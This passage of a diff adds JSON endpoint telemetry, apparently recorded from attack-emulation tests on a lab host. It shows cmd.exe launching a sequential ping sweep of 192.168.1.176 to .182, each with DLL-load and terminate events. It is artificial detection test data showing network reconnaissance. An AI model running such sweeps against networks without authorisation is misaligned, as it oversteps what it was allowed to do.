}, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572842140000, + "unique_pid": "{42FC7E13-CBA4-5C05-0000-001063405301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572842140000, + "unique_pid": "{42FC7E13-CBA4-5C05-0000-001063405301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572842140000, + "unique_pid": "{42FC7E13-CBA4-5C05-0000-001063405301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572842140000, + "unique_pid": "{42FC7E13-CBA4-5C05-0000-001063405301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572842140000, + "unique_pid": "{42FC7E13-CBA4-5C05-0000-001063405301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572842140000, + "unique_pid": "{42FC7E13-CBA4-5C05-0000-001063405301}" + }, + { + "event_type": "process", + "pid": 5244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572846990000, + "unique_pid": "{42FC7E13-CBA4-5C05-0000-001063405301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.176", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6488, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572847140000, + "unique_pid": "{42FC7E13-CBA4-5C05-0000-0010E5425301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6488, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572847140000, + "unique_pid": "{42FC7E13-CBA4-5C05-0000-0010E5425301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6488, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572847140000, + "unique_pid": "{42FC7E13-CBA4-5C05-0000-0010E5425301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6488, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572847140000, + "unique_pid": "{42FC7E13-CBA4-5C05-0000-0010E5425301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6488, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572847140000, + "unique_pid": "{42FC7E13-CBA4-5C05-0000-0010E5425301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6488, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572847140000, + "unique_pid": "{42FC7E13-CBA4-5C05-0000-0010E5425301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6488, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572847140000, + "unique_pid": "{42FC7E13-CBA4-5C05-0000-0010E5425301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6488, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572847140000, + "unique_pid": "{42FC7E13-CBA4-5C05-0000-0010E5425301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6488, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572847140000, + "unique_pid": "{42FC7E13-CBA4-5C05-0000-0010E5425301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6488, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572847140000, + "unique_pid": "{42FC7E13-CBA4-5C05-0000-0010E5425301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6488, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572847140000, + "unique_pid": "{42FC7E13-CBA4-5C05-0000-0010E5425301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6488, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572847140000, + "unique_pid": "{42FC7E13-CBA4-5C05-0000-0010E5425301}" + }, + { + "event_type": "process", + "pid": 6488, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572851830000, + "unique_pid": "{42FC7E13-CBA4-5C05-0000-0010E5425301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.177", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5428, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572851980000, + "unique_pid": "{42FC7E13-CBA5-5C05-0000-001055455301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5428, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572851980000, + "unique_pid": "{42FC7E13-CBA5-5C05-0000-001055455301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5428, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572851980000, + "unique_pid": "{42FC7E13-CBA5-5C05-0000-001055455301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5428, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572851980000, + "unique_pid": "{42FC7E13-CBA5-5C05-0000-001055455301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5428, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572851980000, + "unique_pid": "{42FC7E13-CBA5-5C05-0000-001055455301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5428, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572851980000, + "unique_pid": "{42FC7E13-CBA5-5C05-0000-001055455301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5428, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572851980000, + "unique_pid": "{42FC7E13-CBA5-5C05-0000-001055455301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5428, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572851980000, + "unique_pid": "{42FC7E13-CBA5-5C05-0000-001055455301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5428, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572851980000, + "unique_pid": "{42FC7E13-CBA5-5C05-0000-001055455301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5428, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572851980000, + "unique_pid": "{42FC7E13-CBA5-5C05-0000-001055455301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5428, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572851980000, + "unique_pid": "{42FC7E13-CBA5-5C05-0000-001055455301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5428, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572851980000, + "unique_pid": "{42FC7E13-CBA5-5C05-0000-001055455301}" + }, + { + "event_type": "process", + "pid": 5428, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572856990000, + "unique_pid": "{42FC7E13-CBA5-5C05-0000-001055455301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.178", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1916, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572857130000, + "unique_pid": "{42FC7E13-CBA5-5C05-0000-0010D2475301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 1916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572857140000, + "unique_pid": "{42FC7E13-CBA5-5C05-0000-0010D2475301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572857140000, + "unique_pid": "{42FC7E13-CBA5-5C05-0000-0010D2475301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572857140000, + "unique_pid": "{42FC7E13-CBA5-5C05-0000-0010D2475301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572857140000, + "unique_pid": "{42FC7E13-CBA5-5C05-0000-0010D2475301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572857140000, + "unique_pid": "{42FC7E13-CBA5-5C05-0000-0010D2475301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 1916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572857140000, + "unique_pid": "{42FC7E13-CBA5-5C05-0000-0010D2475301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 1916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572857140000, + "unique_pid": "{42FC7E13-CBA5-5C05-0000-0010D2475301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 1916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572857140000, + "unique_pid": "{42FC7E13-CBA5-5C05-0000-0010D2475301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 1916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572857300000, + "unique_pid": "{42FC7E13-CBA5-5C05-0000-0010D2475301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 1916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572857300000, + "unique_pid": "{42FC7E13-CBA5-5C05-0000-0010D2475301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 1916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572857300000, + "unique_pid": "{42FC7E13-CBA5-5C05-0000-0010D2475301}" + }, + { + "event_type": "process", + "pid": 1916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572861830000, + "unique_pid": "{42FC7E13-CBA5-5C05-0000-0010D2475301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.179", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1544, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572861980000, + "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010294C5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 1544, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572861980000, + "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010294C5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1544, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572861980000, + "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010294C5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1544, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572861980000, + "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010294C5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1544, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572861980000, + "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010294C5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1544, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572861980000, + "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010294C5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 1544, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572861980000, + "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010294C5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 1544, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572861980000, + "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010294C5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 1544, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572861980000, + "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010294C5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 1544, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572861980000, + "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010294C5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 1544, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572861980000, + "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010294C5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 1544, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572861980000, + "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010294C5301}" + }, + { + "event_type": "process", + "pid": 1544, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572866990000, + "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010294C5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.180", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2784, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572867130000, + "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010A54E5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 2784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572867140000, + "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010A54E5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572867140000, + "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010A54E5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572867140000, + "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010A54E5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572867140000, + "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010A54E5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572867140000, + "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010A54E5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 2784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572867140000, + "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010A54E5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572867140000, + "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010A54E5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 2784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572867140000, + "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010A54E5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 2784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572867140000, + "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010A54E5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 2784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572867140000, + "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010A54E5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 2784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572867300000, + "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010A54E5301}" + }, + { + "event_type": "process", + "pid": 2784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572871830000, + "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010A54E5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.181", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2228, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572871980000, + "unique_pid": "{42FC7E13-CBA7-5C05-0000-001019515301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 2228, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572871990000, + "unique_pid": "{42FC7E13-CBA7-5C05-0000-001019515301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2228, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572871990000, + "unique_pid": "{42FC7E13-CBA7-5C05-0000-001019515301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2228, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572871990000, + "unique_pid": "{42FC7E13-CBA7-5C05-0000-001019515301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2228, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572871990000, + "unique_pid": "{42FC7E13-CBA7-5C05-0000-001019515301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2228, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572871990000, + "unique_pid": "{42FC7E13-CBA7-5C05-0000-001019515301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 2228, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572871990000, + "unique_pid": "{42FC7E13-CBA7-5C05-0000-001019515301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2228, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572871990000, + "unique_pid": "{42FC7E13-CBA7-5C05-0000-001019515301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 2228, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572871990000, + "unique_pid": "{42FC7E13-CBA7-5C05-0000-001019515301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 2228, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572871990000, + "unique_pid": "{42FC7E13-CBA7-5C05-0000-001019515301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 2228, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572871990000, + "unique_pid": "{42FC7E13-CBA7-5C05-0000-001019515301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 2228, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572871990000, + "unique_pid": "{42FC7E13-CBA7-5C05-0000-001019515301}" + }, + { + "event_type": "process", + "pid": 2228, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572876840000, + "unique_pid": "{42FC7E13-CBA7-5C05-0000-001019515301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.182", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5736, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572876980000, + "unique_pid": "{42FC7E13-CBA7-5C05-0000-001096535301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5736, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572876980000, + "unique_pid": "{42FC7E13-CBA7-5C05-0000-001096535301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5736, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572876980000, + "unique_pid": "{42FC7E13-CBA7-5C05-0000-001096535301}" + }, + { + "event_type": "image_load", + 